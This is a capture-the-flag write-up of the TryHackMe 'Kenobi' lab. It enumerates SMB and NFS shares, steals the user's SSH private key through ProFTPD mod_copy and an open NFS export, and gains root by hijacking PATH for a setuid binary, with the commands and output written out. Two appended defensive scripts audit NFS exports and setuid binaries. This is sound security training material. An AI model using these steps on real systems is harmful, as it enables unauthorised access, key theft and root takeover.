TryHackMe - Kenobi
[Task 1] Deploy the vulnerable machine
Set up a bash environment variable
export IP=KENOBI-IP
NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.
Make sure there is a connection to the THM network
ping $IP -c 3
PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data.
64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms
64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms
64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms

--- KENOBI-IP ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms
Scan the machine with nmap
nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Initiating Ping Scan at 18:38
Scanning KENOBI-IP [2 ports]
Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:38
Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:38
Scanning KENOBI-IP [1000 ports]
Discovered open port 21/tcp on KENOBI-IP
Discovered open port 80/tcp on KENOBI-IP
Discovered open port 139/tcp on KENOBI-IP
Discovered open port 111/tcp on KENOBI-IP
Discovered open port 22/tcp on KENOBI-IP
Discovered open port 445/tcp on KENOBI-IP
Discovered open port 2049/tcp on KENOBI-IP
Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports)
Initiating Service scan at 18:38
Scanning 7 services on KENOBI-IP
Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host)
NSE: Script scanning KENOBI-IP.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 1.99s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Nmap scan report for KENOBI-IP
Host is up, received syn-ack (0.044s latency).
Scanned at 2020-05-09 18:38:16 EDT for 14s
Not shown: 993 closed ports
Reason: 993 conn-refused
PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack ProFTPD 1.3.5
22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
|   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      34097/tcp   mountd
|   100005  1,2,3      42895/udp6  mountd
|   100005  1,2,3      49712/udp   mountd
|   100005  1,2,3      54641/tcp6  mountd
|   100021  1,3,4      38881/tcp   nlockmgr
|   100021  1,3,4      42051/tcp6  nlockmgr
|   100021  1,3,4      52158/udp   nlockmgr
|   100021  1,3,4      59194/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     syn-ack 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 33364/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63681/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 58242/udp): CLEAN (Failed to receive data)
|   Check 4 (port 4291/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-05-10T01:36:31-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-10T06:36:31
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
Answer = 8
[Task 2] Enumerating Samba for shares
Use nmap to enumerate the machine for SMB shares
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT
Nmap scan report for KENOBI-IP
Host is up (0.042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\KENOBI-IP\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\KENOBI-IP\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\KENOBI-IP\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
How many shares have been found?
Answer = 3
List files within the SMB share
smbclient //KENOBI-IP/anonymous
Enter WORKGROUP\c0g's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877104 blocks available
Answer = log.txt
Recursively download the SMB share.
smbget -R smb://KENOBI-IP/anonymous
Password for [c0g] connecting to //anonymous/KENOBI-IP:
Using workgroup WORKGROUP, user c0g
smb://KENOBI-IP/anonymous/log.txt
Downloaded 11.95kB in 3 seconds

cat log.txt | grep port
# Port 21 is the standard FTP port.
# Don't use IPv6 support by default.
# behaviour of Samba but the option is considered important
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no
# By default, the home directories are exported read-only. Change the
What port is FTP running on? Answer = 21
Enumerate the NFS share on port 111
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT
Nmap scan report for KENOBI-IP
Host is up (0.042s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
What mount can we see?
Answer = /var
[Task 3] Gain initial access with ProFTPD
Use netcat to connect to the machine on the FTP port.
netcat KENOBI-IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
Use searchsploit to find exploits for ProFTPD
searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
 Exploit Title                                | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
What is the version? Answer = 1.3.5
Copy Kenobi's private key using the SITE CPFR and SITE CPTO commands.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
350 File or directory exists, ready for destination name
250 Copy successful
The /var directory was the NFS mount seen earlier; therefore, Kenobi's private key can be copied to /var/tmp, where it will be readable through the export. Mount the /var export (which contains /var/tmp) on the attacking machine:
sudo mkdir /mnt/kenobiNFS
sudo mount KENOBI-IP:/var /mnt/kenobiNFS/
ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root    4096 2019-09-04 2019 .
drwxr-xr-x  3 root root    4096 2020-05-09 22:06 ..
drwxr-xr-x  2 root root    4096 2019-09-04 2019 backups
drwxr-xr-x  9 root root    4096 2019-09-04 2019 cache
drwxrwxrwt  2 root root    4096 2019-09-04 2019 crash
drwxr-xr-x 40 root root    4096 2019-09-04 2019 lib
drwxrwsr-x  2 root staff   4096 2016-04-12 2016 local
lrwxrwxrwx  1 root root       9 2019-09-04 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 2019-09-04 2019 log
drwxrwsr-x  2 root mail    4096 2019-02-26 2019 mail
drwxr-xr-x  2 root root    4096 2019-02-26 2019 opt
lrwxrwxrwx  1 root root       4 2019-09-04 2019 run -> /run
drwxr-xr-x  2 root root    4096 2019-01-29 2019 snap
drwxr-xr-x  5 root root    4096 2019-09-04 2019 spool
drwxrwxrwt  6 root root    4096 2020-05-10 05:49 tmp
drwxr-xr-x  3 root root    4096 2019-09-04 2019 www
Go to /var/tmp on the mount and fetch the private key to log in to Kenobi's account
cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
[sudo] password for c0g:
ssh -i id_rsa kenobi@KENOBI-IP
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.

Last login: Sun May 10 05:18:41 2020 from 10.11.1.193
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

cat /home/kenobi/user.txt | wc -c
33
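The whole chain in this task rests on the export nmap reported in Task 2: /var is exported to * (any host), so a file copied into /var/tmp becomes readable from the attacking machine. As an added example (my code, not part of the writeup), here is a defender-side check for an /etc/exports-style file that flags world-exported paths and exports with no_root_squash; the sample exports file is constructed, with its first line mirroring the Kenobi finding, and the function names are my own.

```shell
# Added example (not from the writeup): audit an /etc/exports-style file for
# the two settings that make an NFS export a data-exposure problem.
#   WORLD     - client spec is '*' or missing (any host may mount it, as
#               nfs-showmount reported for /var above)
#   NOROOTSQ  - no_root_squash lets a remote root stay root on the export
audit_exports() {                        # $1 = path to an exports file
    awk '
        /^[ \t]*(#|$)/ { next }          # skip comments and blank lines
        {
            path = $1
            if (NF == 1) { print path " WORLD (no client list)"; next }
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                if (match(client, /\(.*\)$/)) {          # split host(opts)
                    opts = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                if (client == "*" || client == "")
                    print path " WORLD client=" $i
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    print path " NOROOTSQ client=" $i
            }
        }' "$1"
}

# Constructed sample: the first export mirrors what nmap nfs-showmount
# reported on Kenobi (/var *); the other two are made up for contrast.
sample_exports() {
    cat <<'EOF'
# /etc/exports (constructed sample)
/var *
/srv/data 10.0.0.0/24(rw,sync,no_root_squash)
/srv/public 10.0.0.5(ro,root_squash)
EOF
}

# Write the sample to a temp file, audit it, clean up; prints the findings.
audit_exports_sample() {
    f=$(mktemp)
    sample_exports > "$f"
    audit_exports "$f"
    rm -f "$f"
}
```

On a real host run audit_exports /etc/exports; each WORLD line is a share any network peer can mount, which is what exposed the copied key here.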
[Task 4] Privilege Escalation with Path Variable Manipulation
Search the system for SUID type files
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$
What file looks particularly out of the ordinary?
Answer = /usr/bin/menu
Run the binary
kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
Enter your choice :
How many options appear? Answer = 3
Use strings to look for anything human readable within the binary
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
......... output shortened
This shows the binary runs its commands without a full path (curl rather than /usr/bin/curl, uname rather than /usr/bin/uname). Because the file is setuid and runs with the root user's privileges, the PATH environment variable can be changed so that a different curl is found first, which gives a root shell.
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c
33
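The writeup found this by hand: find for setuid files, then strings to see that menu invokes curl, uname and ifconfig by bare name. As an added example (my code, not part of the writeup), here is that audit as a repeatable hardening check for a host: it reports command strings inside setuid binaries that are not absolute paths. The sample strings are constructed to mirror the menu output above; unqualified_commands, installed_commands and the other function names are my own.

```shell
# Added example (not from the writeup): flag command strings inside a binary
# that are invoked by bare name instead of absolute path. A setuid program
# calling system("curl -I localhost") resolves curl through the caller's
# PATH, which is the weakness shown above for /usr/bin/menu.
# unqualified_commands KNOWN_CMDS   (reads `strings` output on stdin)
# Prints each line whose first word is one of KNOWN_CMDS (space-separated)
# and is not an absolute path.
unqualified_commands() {
    known="$1"
    while IFS= read -r line; do
        first=${line%% *}                  # first whitespace-separated word
        case "$first" in
            /*|'') continue ;;             # absolute path or empty: fine
        esac
        for cmd in $known; do
            if [ "$first" = "$cmd" ]; then
                printf '%s\n' "$line"
                break
            fi
        done
    done
}

# Names installed in the usual bin directories, so a real audit needs no list.
installed_commands() {
    ls /usr/bin /bin /sbin /usr/sbin 2>/dev/null | sort -u | tr '\n' ' '
}

# Walk every setuid file and report unqualified command strings inside it
# (what the writeup did by hand with find and strings).
audit_suid_binaries() {
    known=$(installed_commands)
    find / -perm -4000 -type f 2>/dev/null | while IFS= read -r bin; do
        hits=$(strings "$bin" | unqualified_commands "$known")
        [ -n "$hits" ] && printf '%s:\n%s\n' "$bin" "$hits"
    done
}
# Constructed sample modelled on the strings output of /usr/bin/menu above.
sample_strings() {
    cat <<'EOF'
GLIBC_2.4
Enter your choice :
curl -I localhost
uname -r
ifconfig
/usr/bin/id -u
EOF
}

audit_strings_sample() { sample_strings | unqualified_commands "curl uname ifconfig id"; }
```

A hit from audit_suid_binaries means the fix belongs in that program: call commands by absolute path and set PATH explicitly before system(), or drop the setuid bit if it is not needed.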